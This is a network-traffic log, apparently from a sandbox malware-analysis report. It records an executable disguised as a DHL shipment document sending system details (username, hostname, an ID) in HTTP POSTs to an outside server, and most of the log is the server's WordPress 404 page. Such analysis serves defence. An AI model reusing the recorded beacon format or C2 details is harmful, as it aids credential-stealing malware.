                  Mar 21, 2023 07:13:26.076508999 CET215INData Raw: 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 68 32 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 68 33 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 68 34 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 68 35 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e
                  Data Ascii: -background,h2.has-background,h3.has-background,h4.has-background,h5.has-background,h6.has-background{padding:1.25em 2.375em}</style><style id='wp-block-paragraph-inline-css'>.is-small-text{font-size:.875em}.is-regular-text{font-size:1em}.i
                  Mar 21, 2023 07:13:26.076571941 CET217INData Raw: 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 2d 69 6e 73 69 64 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63
                  Data Ascii: earch__button{margin-left:0}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper){padding:4px;border:1px solid #949494}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) .wp-block-search__input{border-r
                  Mar 21, 2023 07:13:26.076628923 CET218INData Raw: 33 31 33 31 7d 3a 72 6f 6f 74 20 2e 68 61 73 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 23 65 65 65 7d 3a 72 6f 6f 74 20 2e 68 61 73 2d 76 65 72 79 2d 64 61 72 6b 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63
                  Data Ascii: 3131}:root .has-very-light-gray-color{color:#eee}:root .has-very-dark-gray-color{color:#313131}:root .has-vivid-green-cyan-to-vivid-cyan-blue-gradient-background{background:linear-gradient(135deg,#00d084,#0693e3)}:root .has-purple-crush-gradie
                  Mar 21, 2023 07:13:26.076672077 CET220INData Raw: 75 73 74 69 66 69 65 64 2d 72 69 67 68 74 7b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 65 6e 64 7d 2e 69 74 65 6d 73 2d 6a 75 73 74 69 66 69 65 64 2d 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7b 6a 75 73 74 69 66 79 2d 63 6f 6e
                  Data Ascii: ustified-right{justify-content:flex-end}.items-justified-space-between{justify-content:space-between}.screen-reader-text{border:0;clip:rect(1px,1px,1px,1px);clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolut
                  Mar 21, 2023 07:13:26.076721907 CET221INData Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 30 30 30 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d
                  Data Ascii: p--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff
                  Mar 21, 2023 07:13:26.076788902 CET222INData Raw: 67 72 61 79 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 33 38 2c 32 33 38 2c 32 33 38 29 20 30 25 2c 72 67 62 28 31 36 39 2c 31 38 34 2c 31 39 35 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73
                  Data Ascii: gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,r
                  Mar 21, 2023 07:13:26.244888067 CET224INData Raw: 75 6f 74 6f 6e 65 2d 2d 6d 61 67 65 6e 74 61 2d 79 65 6c 6c 6f 77 3a 20 75 72 6c 28 27 23 77 70 2d 64 75 6f 74 6f 6e 65 2d 6d 61 67 65 6e 74 61 2d 79 65 6c 6c 6f 77 27 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 64 75 6f 74 6f 6e 65 2d 2d 70
                  Data Ascii: uotone--magenta-yellow: url('#wp-duotone-magenta-yellow');--wp--preset--duotone--purple-green: url('#wp-duotone-purple-green');--wp--preset--duotone--blue-orange: url('#wp-duotone-blue-orange');--wp--preset--font-size--small: clamp(0.875rem, 0


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  4192.168.2.44970164.227.48.21280C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe
                  TimestampkBytes transferredDirectionData
                  Mar 21, 2023 07:13:27.165441990 CET228OUTPOST /?page_id=215360 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 64.227.48.212
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 2F9D8E6A
                  Content-Length: 163
                  Connection: close
                  Mar 21, 2023 07:13:27.333852053 CET229OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 36 00 36 00 36 00 35 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.rujones066656DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Mar 21, 2023 07:13:28.111509085 CET230INHTTP/1.0 404 Not Found
                  Date: Tue, 21 Mar 2023 06:13:27 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://robertmario.is/index.php?rest_route=/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 4d 79 20 67 61 6d 69 6e 67 20 67 69 66 74 73 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 79 20 67 61 6d 69 6e 67 20 67 69 66 74 73 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 72 6f 62 65 72 74 6d 61 72 69 6f 2e 69 73 2f 3f 66 65 65 64 3d 72 73 73 32 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 79 20 67 61 6d 69 6e 67 20 67 69 66 74 73 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 72 6f 62 65 72 74 6d 61 72 69 6f 2e 69 73 2f 3f 66 65 65 64 3d 63 6f 6d 6d 65 6e 74 73 2d 72 73 73 32 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 72 6f 62 65 72 74 6d 61 72 69 6f 2e 69 73 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 31 2e 31 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 61 2c 74 29 7b 76 61 72 20 6e 2c 72 2c 6f 2c 69 3d 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 70 3d 69 2e 67 65 74 43 6f 6e 74 65 78 74 26 26 69 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 29 3b 66 75 6e
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='max-image-preview:large' /><title>Page not found &#8211; My gaming gifts</title><link rel="alternate" type="application/rss+xml" title="My gaming gifts &raquo; Feed" href="http://robertmario.is/?feed=rss2" /><link rel="alternate" type="application/rss+xml" title="My gaming gifts &raquo; Comments Feed" href="http://robertmario.is/?feed=comments-rss2" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/robertmario.is\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.1.1"}};/*! This file is auto-generated */!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");fun
                  Mar 21, 2023 07:13:28.111579895 CET231INData Raw: 63 74 69 6f 6e 20 73 28 65 2c 74 29 7b 76 61 72 20 61 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 2c 65 3d 28 70 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 69 2e 77 69 64 74 68 2c 69 2e 68 65 69 67 68 74 29 2c 70 2e 66 69 6c 6c
                  Data Ascii: ction s(e,t){var a=String.fromCharCode,e=(p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0),i.toDataURL());return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createE
                  Mar 21, 2023 07:13:28.111625910 CET232INData Raw: 6e 63 74 69 6f 6e 28 29 7b 74 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 2c 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 7c 7c 28 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 2c 61 2e
                  Data Ascii: nction(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",func
                  Mar 21, 2023 07:13:28.111692905 CET234INData Raw: 6e 3a 20 6e 6f 6e 65 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 70 61 67 65 2d 6c 69 73 74 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e
                  Data Ascii: n: none;}</style><style id='wp-block-page-list-inline-css'>.wp-block-navigation .wp-block-page-list{display:flex;flex-direction:var(--navigation-layout-direction,initial);justify-content:var(--navigation-layout-justify,initial);align-items:
                  Mar 21, 2023 07:13:28.111742020 CET235INData Raw: 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 68 32 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 68 33 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 68 34 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 68 35 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e
                  Data Ascii: -background,h2.has-background,h3.has-background,h4.has-background,h5.has-background,h6.has-background{padding:1.25em 2.375em}</style><style id='wp-block-paragraph-inline-css'>.is-small-text{font-size:.875em}.is-regular-text{font-size:1em}.i
                  Mar 21, 2023 07:13:28.111792088 CET236INData Raw: 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 2d 69 6e 73 69 64 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63
                  Data Ascii: earch__button{margin-left:0}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper){padding:4px;border:1px solid #949494}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) .wp-block-search__input{border-r
                  Mar 21, 2023 07:13:28.111850023 CET238INData Raw: 33 31 33 31 7d 3a 72 6f 6f 74 20 2e 68 61 73 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 23 65 65 65 7d 3a 72 6f 6f 74 20 2e 68 61 73 2d 76 65 72 79 2d 64 61 72 6b 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63
                  Data Ascii: 3131}:root .has-very-light-gray-color{color:#eee}:root .has-very-dark-gray-color{color:#313131}:root .has-vivid-green-cyan-to-vivid-cyan-blue-gradient-background{background:linear-gradient(135deg,#00d084,#0693e3)}:root .has-purple-crush-gradie
                  Mar 21, 2023 07:13:28.111898899 CET239INData Raw: 75 73 74 69 66 69 65 64 2d 72 69 67 68 74 7b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 65 6e 64 7d 2e 69 74 65 6d 73 2d 6a 75 73 74 69 66 69 65 64 2d 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7b 6a 75 73 74 69 66 79 2d 63 6f 6e
                  Data Ascii: ustified-right{justify-content:flex-end}.items-justified-space-between{justify-content:space-between}.screen-reader-text{border:0;clip:rect(1px,1px,1px,1px);clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolut
                  Mar 21, 2023 07:13:28.111947060 CET241INData Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 30 30 30 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d
                  Data Ascii: p--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff
                  Mar 21, 2023 07:13:28.112008095 CET242INData Raw: 67 72 61 79 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 33 38 2c 32 33 38 2c 32 33 38 29 20 30 25 2c 72 67 62 28 31 36 39 2c 31 38 34 2c 31 39 35 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73
                  Data Ascii: gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,r
                  Mar 21, 2023 07:13:28.281061888 CET243INData Raw: 75 6f 74 6f 6e 65 2d 2d 6d 61 67 65 6e 74 61 2d 79 65 6c 6c 6f 77 3a 20 75 72 6c 28 27 23 77 70 2d 64 75 6f 74 6f 6e 65 2d 6d 61 67 65 6e 74 61 2d 79 65 6c 6c 6f 77 27 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 64 75 6f 74 6f 6e 65 2d 2d 70
                  Data Ascii: uotone--magenta-yellow: url('#wp-duotone-magenta-yellow');--wp--preset--duotone--purple-green: url('#wp-duotone-purple-green');--wp--preset--duotone--blue-orange: url('#wp-duotone-blue-orange');--wp--preset--font-size--small: clamp(0.875rem, 0


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  5192.168.2.44970264.227.48.21280C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe
                  TimestampkBytes transferredDirectionData
                  Mar 21, 2023 07:13:28.916497946 CET273OUTPOST /?page_id=215360 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 64.227.48.212
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 2F9D8E6A
                  Content-Length: 163
                  Connection: close
                  Mar 21, 2023 07:13:29.083960056 CET273OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 36 00 36 00 36 00 35 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.rujones066656DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Mar 21, 2023 07:13:29.829490900 CET275INHTTP/1.0 404 Not Found
                  Date: Tue, 21 Mar 2023 06:13:28 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://robertmario.is/index.php?rest_route=/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 4d 79 20 67 61 6d 69 6e 67 20 67 69 66 74 73 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 79 20 67 61 6d 69 6e 67 20 67 69 66 74 73 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 72 6f 62 65 72 74 6d 61 72 69 6f 2e 69 73 2f 3f 66 65 65 64 3d 72 73 73 32 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 79 20 67 61 6d 69 6e 67 20 67 69 66 74 73 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 72 6f 62 65 72 74 6d 61 72 69 6f 2e 69 73 2f 3f 66 65 65 64 3d 63 6f 6d 6d 65 6e 74 73 2d 72 73 73 32 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 72 6f 62 65 72 74 6d 61 72 69 6f 2e 69 73 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 31 2e 31 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 61 2c 74 29 7b 76 61 72 20 6e 2c 72 2c 6f 2c 69 3d 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 70 3d 69 2e 67 65 74 43 6f 6e 74 65 78 74 26 26 69 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 29 3b 66 75 6e
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='max-image-preview:large' /><title>Page not found &#8211; My gaming gifts</title><link rel="alternate" type="application/rss+xml" title="My gaming gifts &raquo; Feed" href="http://robertmario.is/?feed=rss2" /><link rel="alternate" type="application/rss+xml" title="My gaming gifts &raquo; Comments Feed" href="http://robertmario.is/?feed=comments-rss2" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/robertmario.is\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.1.1"}};/*! This file is auto-generated */!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");fun
                  Mar 21, 2023 07:13:29.829539061 CET276INData Raw: 63 74 69 6f 6e 20 73 28 65 2c 74 29 7b 76 61 72 20 61 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 2c 65 3d 28 70 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 69 2e 77 69 64 74 68 2c 69 2e 68 65 69 67 68 74 29 2c 70 2e 66 69 6c 6c
                  Data Ascii: ction s(e,t){var a=String.fromCharCode,e=(p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0),i.toDataURL());return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createE
                  Mar 21, 2023 07:13:29.829566956 CET277INData Raw: 6e 63 74 69 6f 6e 28 29 7b 74 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 2c 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 7c 7c 28 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 2c 61 2e
                  Data Ascii: nction(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",func
                  Mar 21, 2023 07:13:29.829596043 CET278INData Raw: 6e 3a 20 6e 6f 6e 65 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 70 61 67 65 2d 6c 69 73 74 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e
                  Data Ascii: n: none;}</style><style id='wp-block-page-list-inline-css'>.wp-block-navigation .wp-block-page-list{display:flex;flex-direction:var(--navigation-layout-direction,initial);justify-content:var(--navigation-layout-justify,initial);align-items:
                  Mar 21, 2023 07:13:29.829627037 CET280INData Raw: 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 68 32 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 68 33 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 68 34 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 68 35 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e
                  Data Ascii: -background,h2.has-background,h3.has-background,h4.has-background,h5.has-background,h6.has-background{padding:1.25em 2.375em}</style><style id='wp-block-paragraph-inline-css'>.is-small-text{font-size:.875em}.is-regular-text{font-size:1em}.i
                  Mar 21, 2023 07:13:29.829657078 CET281INData Raw: 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 2d 69 6e 73 69 64 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63
                  Data Ascii: earch__button{margin-left:0}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper){padding:4px;border:1px solid #949494}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) .wp-block-search__input{border-r
                  Mar 21, 2023 07:13:29.829688072 CET283INData Raw: 33 31 33 31 7d 3a 72 6f 6f 74 20 2e 68 61 73 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 23 65 65 65 7d 3a 72 6f 6f 74 20 2e 68 61 73 2d 76 65 72 79 2d 64 61 72 6b 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63
